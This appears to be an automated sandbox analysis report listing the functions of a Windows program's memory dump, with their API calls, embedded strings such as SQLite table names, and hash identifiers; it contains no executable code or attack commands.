GetParent.USER32(?), ref: 0040B620
GetWindowRect.USER32 ref: 0040B62D
GetClientRect.USER32 ref: 0040B638
MapWindowPoints.USER32 ref: 0040B648
SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040B664

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Window$Rect$ClientParentPoints
String ID:
API String ID: 4247780290-0
Opcode ID: 4132645c0205fca9f5305145dfaca5e8ad85c8db49ac0fde3fc8653dad27a9db
Instruction ID: 46ce5f71d2b2052eec3e6930e994fa0a792d7dbc784fe0d7727ff2cdb1cfdf95
Opcode Fuzzy Hash: 4132645c0205fca9f5305145dfaca5e8ad85c8db49ac0fde3fc8653dad27a9db
Instruction Fuzzy Hash: 9D014836401129BBDB119BA59C49EFFBFBCFF06755F04402AFD01A2181D77895028BA9

Uniqueness

Uniqueness Score: -1.00%

Function 004442F9, Relevance: 7.5, APIs: 5, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 00407D7B: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,00444305,00000000,?,00000000,00000000,0041274B,?,?), ref: 00407D8D

GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000000,0041274B,?,?), ref: 00444310
??2@YAPAXI@Z.MSVCRT ref: 00444324
memset.MSVCRT ref: 00444333

Part of subcall function 0040897D: ReadFile.KERNEL32(?,?,CCD,00000000,00000000,?,?,00444343,00000000,00000000), ref: 00408994

??3@YAXPAX@Z.MSVCRT ref: 00444356

Part of subcall function 004440EA: memchr.MSVCRT ref: 00444125
Part of subcall function 004440EA: memcpy.MSVCRT ref: 004441C9
Part of subcall function 004440EA: memcpy.MSVCRT ref: 004441DB
Part of subcall function 004440EA: memcpy.MSVCRT ref: 00444203

CloseHandle.KERNEL32(00000000), ref: 0044435D

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
String ID:
API String ID: 1471605966-0
Opcode ID: 49240eb7e72d32db8f10ec2a794cb1604f9c3dfdc848c4e5ddf36aa52843e5e8
Instruction ID: 37ddc15cde46eb5ec9a675e84f83cfdfb4636f792b79cf1c8c19bfac071e4967
Opcode Fuzzy Hash: 49240eb7e72d32db8f10ec2a794cb1604f9c3dfdc848c4e5ddf36aa52843e5e8
Instruction Fuzzy Hash: 64F0C8765006106AE2203732AC89F6B2B5C9FD6761F14043FF916911D2EE2C98148179

Uniqueness

Uniqueness Score: -1.00%

Function 0040C11B, Relevance: 7.5, APIs: 5, Instructions: 41COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT ref: 0040C127
??3@YAXPAX@Z.MSVCRT ref: 0040C135
??3@YAXPAX@Z.MSVCRT ref: 0040C146
??3@YAXPAX@Z.MSVCRT ref: 0040C15D
??3@YAXPAX@Z.MSVCRT ref: 0040C166

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 9db751b9d40129ff607a2ad0f7b23477c9a1a0d584d2dc8bf4dbc2e5fe3abfdd
Instruction ID: ce0d416df33b84177c5a77da38496f7ed087613ba8a01eb08bd82b7dd0746caf
Opcode Fuzzy Hash: 9db751b9d40129ff607a2ad0f7b23477c9a1a0d584d2dc8bf4dbc2e5fe3abfdd
Instruction Fuzzy Hash: D0F049B25047018FE720AFA9E9C091BF3E9AB49714761093FF049D7682DB7CAC808A0C

Uniqueness

Uniqueness Score: -1.00%

Function 0040D913, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040D937
memset.MSVCRT ref: 0040D94E

Part of subcall function 0040CDFA: wcscpy.MSVCRT ref: 0040CDFF
Part of subcall function 0040CDFA: _wcslwr.MSVCRT ref: 0040CE3A

_snwprintf.MSVCRT ref: 0040D97D

Strings

</%s>, xrefs: 0040D96C

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memset$_snwprintf_wcslwrwcscpy
String ID: </%s>
API String ID: 3400436232-259020660
Opcode ID: d4b96116a3886d925e69f09e1e7aa17f767efc24742795cd823dba6d7b972355
Instruction ID: 1f907657c5db402736beb96cf917ebbb27e5637f268f278bd00e4de1d3b551c4
Opcode Fuzzy Hash: d4b96116a3886d925e69f09e1e7aa17f767efc24742795cd823dba6d7b972355
Instruction Fuzzy Hash: A701D6B2D4022967E720A755CC45FEA776CEF45308F0400B6BB08B3181DB78DA458AA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040B720, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040B75A
SetWindowTextW.USER32(?,?), ref: 0040B78A
EnumChildWindows.USER32 ref: 0040B79A

Strings

caption, xrefs: 0040B76F

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ChildEnumTextWindowWindowsmemset
String ID: caption
API String ID: 1523050162-4135340389
Opcode ID: a680237547b71f84e7c5f21b380628042884f9aaba9d4c49a1fa12d06f7ec414
Instruction ID: 685c7242f617fb3ba1e31657fb4388fb0a14aaa92a56732ea005dddfaa5a5635
Opcode Fuzzy Hash: a680237547b71f84e7c5f21b380628042884f9aaba9d4c49a1fa12d06f7ec414
Instruction Fuzzy Hash: B1F0AF369007186AFB20AB54DC4AB9A326CEB41705F4000B6FA04B71D2DBB8ED80CADC

Uniqueness

Uniqueness Score: -1.00%

Function 004088A0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 004088E9
wcscpy.MSVCRT ref: 004088F7

Strings

X, xrefs: 004088CA
xK@, xrefs: 004088C0

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileNameOpenwcscpy
String ID: X$xK@
API String ID: 3246554996-3735201224
Opcode ID: 908a77b3f0a760ced81f36d2d2ae0a58bf516f7094468664e135c5813428c6fa
Instruction ID: b0b1e818a48a7f3500c0daa10f1625907e8ff6cd2dadba3970951ebcab59a6c3
Opcode Fuzzy Hash: 908a77b3f0a760ced81f36d2d2ae0a58bf516f7094468664e135c5813428c6fa
Instruction Fuzzy Hash: 28015FB1D0064C9FDB41DFE9D8856CEBBF4AB09314F10802AE869F6240EB7495458F55

Uniqueness

Uniqueness Score: -1.00%

Function 0040103E, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004082B5: memset.MSVCRT ref: 004082BF
Part of subcall function 004082B5: wcscpy.MSVCRT ref: 004082FF

CreateFontIndirectW.GDI32(?), ref: 0040105D
SendDlgItemMessageW.USER32 ref: 0040107C
SendDlgItemMessageW.USER32 ref: 0040109A

Strings

MS Sans Serif, xrefs: 00401049

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
String ID: MS Sans Serif
API String ID: 210187428-168460110
Opcode ID: e453892ad263d581ed8c07d327965f5779054c40888fa458c6814bb6aa3c3a7a
Instruction ID: 6a7807da2d6c22504d803769321e4de0e3b0b92c14fc4c1b5eee7474059f757a
Opcode Fuzzy Hash: e453892ad263d581ed8c07d327965f5779054c40888fa458c6814bb6aa3c3a7a
Instruction Fuzzy Hash: 9EF08275A40B0877EA31ABA0DC06F9A77B9B740B41F000939F751B91D1D7F5A185CA98

Uniqueness

Uniqueness Score: -1.00%

Function 0040840D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040842C
GetClassNameW.USER32 ref: 00408443
_wcsicmp.MSVCRT ref: 00408455

Strings

edit, xrefs: 0040844F

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ClassName_wcsicmpmemset
String ID: edit
API String ID: 2747424523-2167791130
Opcode ID: ebec61093d08ec7c11ef9b525731133b20f87b1b8314aca5ccae6d1865a8b1c0
Instruction ID: 157984a491cfffbc22861ef67f020c4accef2e0f69a1167183a5ff10ddf0174f
Opcode Fuzzy Hash: ebec61093d08ec7c11ef9b525731133b20f87b1b8314aca5ccae6d1865a8b1c0
Instruction Fuzzy Hash: A2E04872D9031D6AFB10ABA0DC4EFAD77ACAB01748F1001B5B915E10D3EBB896454B45

Uniqueness

Uniqueness Score: -1.00%

Function 004144AB, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(shell32.dll,0040FF7C,00000000,?,00000002,?,004448C6,00000000,?,0000000A), ref: 004144B9
GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 004144CE

Strings

shell32.dll, xrefs: 004144B4
SHGetSpecialFolderPathW, xrefs: 004144C8

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: SHGetSpecialFolderPathW$shell32.dll
API String ID: 2574300362-880857682
Opcode ID: ec0b550a6f005db750ce1d6b24d12bf1fdfb92314774ed3a2a33578eaf871c9d
Instruction ID: 5adcb90289d93a3714d1f61360fd38a26edcd17bcdb04c713309b7dc063e595c
Opcode Fuzzy Hash: ec0b550a6f005db750ce1d6b24d12bf1fdfb92314774ed3a2a33578eaf871c9d
Instruction Fuzzy Hash: 89D0C9BCD00304BFEB014F30AC8A70636A8B760BD7F10503AE001D1662EB78C1908B9C

Uniqueness

Uniqueness Score: -1.00%

Function 0041D1AF, Relevance: 6.3, APIs: 5, Instructions: 82COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 0041D1C2
memcpy.MSVCRT ref: 0041D1D8
memcmp.MSVCRT ref: 0041D1E7
memcmp.MSVCRT ref: 0041D22F
memcpy.MSVCRT ref: 0041D24A

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memcpy$memcmp
String ID:
API String ID: 3384217055-0
Opcode ID: b9ae8adf615f369c02f25eb7107bc5ea448d3aeb9579db06496db9a03d397097
Instruction ID: 09945ccab50a33f31b382fa22860e11bd1319c866f4a66b9fbc9fb0ddb64ce7b
Opcode Fuzzy Hash: b9ae8adf615f369c02f25eb7107bc5ea448d3aeb9579db06496db9a03d397097
Instruction Fuzzy Hash: 2C21A4B2E14248ABDB18DBA5DC45FDF73FCAB85704F10442AF511D7181EA38E644C724

Uniqueness

Uniqueness Score: -1.00%

Function 00410212, Relevance: 6.3, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00410231
memset.MSVCRT ref: 00410247
memset.MSVCRT ref: 00410259
memcpy.MSVCRT ref: 0041027E
memset.MSVCRT ref: 00410288

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: f4caee9e838a04182d96899108f95e0bb2b5edd837a40d922fdd0fc6967a6baf
Instruction ID: ff146c4b72cd3461ea0581b3b06c61829aab73f766a4367807c7cf9141d7c205
Opcode Fuzzy Hash: f4caee9e838a04182d96899108f95e0bb2b5edd837a40d922fdd0fc6967a6baf
Instruction Fuzzy Hash: 8C0128B1640B0066E2316B25CC07F5A73A4AFD2714F50061EF142666C2DFECE544815C

Uniqueness

Uniqueness Score: -1.00%

Function 0040E5D7, Relevance: 6.2, APIs: 4, Instructions: 169windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004019F1: GetMenu.USER32(?), ref: 00401A0F
Part of subcall function 004019F1: GetSubMenu.USER32 ref: 00401A16
Part of subcall function 004019F1: EnableMenuItem.USER32 ref: 00401A2E

Part of subcall function 00401A38: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A4F
Part of subcall function 00401A38: SendMessageW.USER32(?,00000411,?,?), ref: 00401A73

GetMenu.USER32(?), ref: 0040E7C9
GetSubMenu.USER32 ref: 0040E7D6
GetSubMenu.USER32 ref: 0040E7D9
CheckMenuRadioItem.USER32 ref: 0040E7E5

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Menu$ItemMessageSend$CheckEnableRadio
String ID:
API String ID: 1889144086-0
Opcode ID: 83a0e922cd1e8dee9c6445d434e826569a79f8e3c030a9086352cee87eac6e04
Instruction ID: 25cc4134299d990fe6d22a23efa4e99655f13f9d527333d0ba489a0a70db3f06
Opcode Fuzzy Hash: 83a0e922cd1e8dee9c6445d434e826569a79f8e3c030a9086352cee87eac6e04
Instruction Fuzzy Hash: EF519071B40604BBEB20ABA6CD4AF8FBAB9EB44704F00056DB248B72E2C6756D50DB54

Uniqueness

Uniqueness Score: -1.00%

Function 004178F0, Relevance: 6.1, APIs: 4, Instructions: 138fileCOMMON

Download Yara Rule

APIs

CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004179D3
MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004179FE
GetLastError.KERNEL32 ref: 00417A25
CloseHandle.KERNEL32(00000000), ref: 00417A3B

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$CloseCreateErrorHandleLastMappingView
String ID:
API String ID: 1661045500-0
Opcode ID: 1d89631bf252ae2f2c4c8445ece2b1e7c45986c35925c9de674870ee8545aac5
Instruction ID: 2596ed0fad154ed29ebf4184e1ce6d35beb67abfb73833eacff1bbd48ddff306
Opcode Fuzzy Hash: 1d89631bf252ae2f2c4c8445ece2b1e7c45986c35925c9de674870ee8545aac5
Instruction Fuzzy Hash: 0A516EB02087019FEB14CF25C981AABB7F5FF84344F10592EE88287A51E734F994CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0042E431, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 004153D6: memset.MSVCRT ref: 004153F0

memcpy.MSVCRT ref: 0042E519

Strings

sqlite_altertab_%s, xrefs: 0042E4EA
virtual tables may not be altered, xrefs: 0042E470
Cannot add a column to a view, xrefs: 0042E486

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memcpymemset
String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
API String ID: 1297977491-2063813899
Opcode ID: 3f378335f80cc59d7eb135424ddc91f3ec91bec2b91706fd248cd0de38cf87d4
Instruction ID: bc03cdfccc2981246e0f5b9510b3d89990825f97592217a3aee3a84e95ce5e7f
Opcode Fuzzy Hash: 3f378335f80cc59d7eb135424ddc91f3ec91bec2b91706fd248cd0de38cf87d4
Instruction Fuzzy Hash: E741B071A10215EFDB00DFA9D881A99B7F0FF48318F54815BE858DB352E778E990CB88

Uniqueness

Uniqueness Score: -1.00%

Function 00430484, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 132COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 004305C4

Strings

, xrefs: 004304FA
CREATE TABLE , xrefs: 00430539
, , xrefs: 00430501

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memcpy
String ID: $, $CREATE TABLE
API String ID: 3510742995-3459038510
Opcode ID: 1040b4c337cd7faea4ce64fd031e57caaf4286bff9d4d2ce94e46056063ae749
Instruction ID: 9113deda8d77e919ddbf50a6a1bf1eccfd02e82bbda2be63f83ad5433933bd3d
Opcode Fuzzy Hash: 1040b4c337cd7faea4ce64fd031e57caaf4286bff9d4d2ce94e46056063ae749
Instruction Fuzzy Hash: 1C518E71D00119EFDB10DF98C491AAFB7B5EF48318F20819BD945AB205E738AA45CF99

Uniqueness

Uniqueness Score: -1.00%

Function 0040E482, Relevance: 6.1, APIs: 4, Instructions: 106COMMON

Download Yara Rule

APIs

Part of subcall function 0040C513: ??2@YAPAXI@Z.MSVCRT ref: 0040C534
Part of subcall function 0040C513: ??3@YAXPAX@Z.MSVCRT ref: 0040C5FB

wcslen.MSVCRT ref: 0040E4B0
_wtoi.MSVCRT ref: 0040E4BC
_wcsicmp.MSVCRT ref: 0040E50A
_wcsicmp.MSVCRT ref: 0040E51B

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _wcsicmp$??2@??3@_wtoiwcslen
String ID:
API String ID: 1549203181-0
Opcode ID: 0f4392e1858a779833333a0416b24e28d587e9bbbfd919652716bcc233ef85a3
Instruction ID: a8ded69f91e0d7bf63f89fae3ec1b4bc8203dfd4cc2a8694f23455ab63246b5f
Opcode Fuzzy Hash: 0f4392e1858a779833333a0416b24e28d587e9bbbfd919652716bcc233ef85a3
Instruction Fuzzy Hash: 06417131900204EFCF21DF9AC980A99B7B5EF48358F1548BAEC05EB396E738DA509B55

Uniqueness

Uniqueness Score: -1.00%

Function 0040F843, Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040F882

Part of subcall function 004087A4: ShellExecuteW.SHELL32(?,open,?,Function_0004552C,Function_0004552C,00000005), ref: 004087BA

SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 0040F8F2
GetMenuStringW.USER32 ref: 0040F90C
GetKeyState.USER32(00000010), ref: 0040F938

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExecuteMenuMessageSendShellStateStringmemset
String ID:
API String ID: 3550944819-0
Opcode ID: 9a1b8f86d4c82467fb85a2d141e0833d89a0986062affb40e8a5ce6add93c36d
Instruction ID: 0cce36cd3d59050ebbb4ae1468268e07e9567f629d0a6bc52b2b72a07dc00bda
Opcode Fuzzy Hash: 9a1b8f86d4c82467fb85a2d141e0833d89a0986062affb40e8a5ce6add93c36d
Instruction Fuzzy Hash: 7041C375500305EBDB30AF15CC88B9673B4EF50325F10857AE9686BAE2C7B8AD89CB14

Uniqueness

Uniqueness Score: -1.00%

Function 00410174, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 004101B7
memcpy.MSVCRT ref: 004101E1
memcpy.MSVCRT ref: 00410205

Strings

@, xrefs: 004101F3

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memcpy
String ID: @
API String ID: 3510742995-2766056989
Opcode ID: 3146a9f0800fb98ab8d741e68a911a3dc47cf6252b201eb637f31c079c1ab91f
Instruction ID: 2b976a00fcfd181f23c33ae21356c60783d23841694cc8dee0d8ac2aa3eeffc6
Opcode Fuzzy Hash: 3146a9f0800fb98ab8d741e68a911a3dc47cf6252b201eb637f31c079c1ab91f
Instruction Fuzzy Hash: EA112BB29003057BDB249F15D884DEA77A9EBA0344700062FFD0696251F6BDDED9C7D8

Uniqueness

Uniqueness Score: -1.00%

Function 0040943C, Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT ref: 00409471
memset.MSVCRT ref: 00409482
memcpy.MSVCRT ref: 0040948E
??3@YAXPAX@Z.MSVCRT ref: 0040949B

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ??2@??3@memcpymemset
String ID:
API String ID: 1865533344-0
Opcode ID: 898d8e9d52820eb96ce10e2226b5f96aabaab06ffaecd95ecc0993478c84b991
Instruction ID: d0afff18851916bdc62762cc26ce26f97abfa6c0527030a4abc257fe2447681f
Opcode Fuzzy Hash: 898d8e9d52820eb96ce10e2226b5f96aabaab06ffaecd95ecc0993478c84b991
Instruction Fuzzy Hash: 2F114F712046019FE328DF1DC881A27F7E5EFD9304B21892EE59A97386DB39E802CB54

Uniqueness

Uniqueness Score: -1.00%

Function 004146B4, Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

SHGetMalloc.SHELL32(?), ref: 004146C4
SHBrowseForFolderW.SHELL32(?), ref: 004146F6
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0041470A
wcscpy.MSVCRT ref: 0041471D

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: BrowseFolderFromListMallocPathwcscpy
String ID:
API String ID: 3917621476-0
Opcode ID: cb6a9e2cdf5430a829d0da304ac5e0abe1f2fc1a776887efdb875fa7bb300fe9
Instruction ID: 097f193ff7923ae7587a5e446372f032271e9f174675921af37de08819f90ac7
Opcode Fuzzy Hash: cb6a9e2cdf5430a829d0da304ac5e0abe1f2fc1a776887efdb875fa7bb300fe9
Instruction Fuzzy Hash: EC11FAB5900208AFDB00DFA9D988AEEB7FCFB49304F10406AE515E7240D738DB45CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0042F6EF, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 0042F72A
memset.MSVCRT ref: 0042F734
memcpy.MSVCRT ref: 0042F75F

Strings

sqlite_master, xrefs: 0042F702

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memcpy$memset
String ID: sqlite_master
API String ID: 438689982-3163232059
Opcode ID: c646f38e99a0b25c0d94209a59a7168cae4c1a9a59a360b2711f92080c37e354
Instruction ID: df29f02e372fce164f73cef38905b10b73feda933693282389fd2907aeed520f
Opcode Fuzzy Hash: c646f38e99a0b25c0d94209a59a7168cae4c1a9a59a360b2711f92080c37e354
Instruction Fuzzy Hash: 8B01F572900618BAEB11BBA0CC42FDEB77DFF45315F50005AF60062042DB79AA148B98

Uniqueness

Uniqueness Score: -1.00%

Function 0040E7F0, Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0040B301: GetModuleHandleW.KERNEL32(00000000,?,?,0040C3FA,?,0040FE90,00000000,00000000,?), ref: 0040B340
Part of subcall function 0040B301: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040B3D9
Part of subcall function 0040B301: memcpy.MSVCRT ref: 0040B419

_snwprintf.MSVCRT ref: 0040E81D
SendMessageW.USER32(?,0000040B,00000000,?), ref: 0040E882

Part of subcall function 0040B301: wcscpy.MSVCRT ref: 0040B382
Part of subcall function 0040B301: wcslen.MSVCRT ref: 0040B3A0
Part of subcall function 0040B301: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040C3FA,?,0040FE90,00000000,00000000,?), ref: 0040B3AE

_snwprintf.MSVCRT ref: 0040E848
wcscat.MSVCRT ref: 0040E85B

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
String ID:
API String ID: 822687973-0
Opcode ID: f595f7851fd5ecf50e789f2e31413ad2f48e9a2df967e8378ccfd76600fbb0fc
Instruction ID: fc9a9cbfa579f1f3c21001c0e8c570231a458ca756af8d40dec707b0d2905b79
Opcode Fuzzy Hash: f595f7851fd5ecf50e789f2e31413ad2f48e9a2df967e8378ccfd76600fbb0fc
Instruction Fuzzy Hash: 540188B650070466F720F7A6DC86FAB73ACDB80704F14047AB719F21C2D679A9514A6D

Uniqueness

Uniqueness Score: -1.00%

Function 004081EA, Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 004081F8
SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00408210
SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00408226
SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00408249

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessageSend$Item
String ID:
API String ID: 3888421826-0
Opcode ID: 381a5bbb51054e29776615c9d78b7fadc6b93f74ad2d14be58dfbd0a9df3dec6
Instruction ID: eb915db23c4b1ca38ea3c1988d88bb83aba39799d6a265b66449fd7df9afb7a9
Opcode Fuzzy Hash: 381a5bbb51054e29776615c9d78b7fadc6b93f74ad2d14be58dfbd0a9df3dec6
Instruction Fuzzy Hash: 10F06975A0050CBFDB018F948E81CAFBBB9EB49784B2000BAF504E6150D6709E01AA61

Uniqueness

Uniqueness Score: -1.00%

Function 00417479, Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00417496
UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 004174B6
LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 004174C2
GetLastError.KERNEL32 ref: 004174D0

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$ErrorLastLockUnlockmemset
String ID:
API String ID: 3727323765-0
Opcode ID: 4810f114b558b10b38af4f71b0c7c6b165b1adf4af59189c3dccd4a982aa45c9
Instruction ID: 68256e963451342af1775745e88af25fe573ff9f394a0ba2c0bbd214266e5fb2
Opcode Fuzzy Hash: 4810f114b558b10b38af4f71b0c7c6b165b1adf4af59189c3dccd4a982aa45c9
Instruction Fuzzy Hash: 7701F435504608BFDB219FA0DC84D9B7FBCFB80705F20843AF942D6050D6349984CB74

Uniqueness

Uniqueness Score: -1.00%

Function 00413A55, Relevance: 6.0, APIs: 4, Instructions: 38COMMON

Download Yara Rule

APIs

Part of subcall function 0040840D: memset.MSVCRT ref: 0040842C
Part of subcall function 0040840D: GetClassNameW.USER32 ref: 00408443
Part of subcall function 0040840D: _wcsicmp.MSVCRT ref: 00408455

SetBkMode.GDI32(?,00000001), ref: 00413A7C
SetBkColor.GDI32(?,00FFFFFF), ref: 00413A8A
SetTextColor.GDI32(?,00C00000), ref: 00413A98
GetStockObject.GDI32(00000000), ref: 00413AA0

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
String ID:
API String ID: 764393265-0
Opcode ID: 16e31c24aafdd867e9f11d81aef655d32ec4149ba1a8bcf71b06e6c70f8613c6
Instruction ID: 110bd5b637e4d79b17592fdcf208372bccb43cad252910099e33a416a39d1a4b
Opcode Fuzzy Hash: 16e31c24aafdd867e9f11d81aef655d32ec4149ba1a8bcf71b06e6c70f8613c6
Instruction Fuzzy Hash: 4DF0C839100208BBCF216F60DC05ACE3F21AF05362F104136F914541F2CB759A90DB4C

Uniqueness

Uniqueness Score: -1.00%

Function 004116B2, Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 004116CC
memcpy.MSVCRT ref: 004116DE
GetModuleHandleW.KERNEL32(00000000), ref: 004116F1
DialogBoxParamW.USER32 ref: 00411705

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memcpy$DialogHandleModuleParam
String ID:
API String ID: 1386444988-0
Opcode ID: a05812b97bd1c831ce7d974adc3378230abb1617476c2fccf6c1e9608279f8eb
Instruction ID: a5b74f8db5ede7a3d830d9ef30c1a68d0a9fd07d2d047c5f1f3455979569a65d
Opcode Fuzzy Hash: a05812b97bd1c831ce7d974adc3378230abb1617476c2fccf6c1e9608279f8eb
Instruction Fuzzy Hash: 6CF08231680710BBE751AF68BC06F467A90A786B93F200427F700A51E2D2F98591CB9C

Uniqueness

Uniqueness Score: -1.00%

Function 0040A19F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 004089BB: SetFilePointer.KERNEL32(0040A46B,?,00000000,00000000,?,0040A271,00000000,00000000,?,00000020,?,0040A401,?,?,*.*,0040A46B), ref: 004089C8

_memicmp.MSVCRT ref: 0040A1B9
memcpy.MSVCRT ref: 0040A1D0

Strings

URL , xrefs: 0040A1B3

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FilePointer_memicmpmemcpy
String ID: URL
API String ID: 2108176848-3574463123
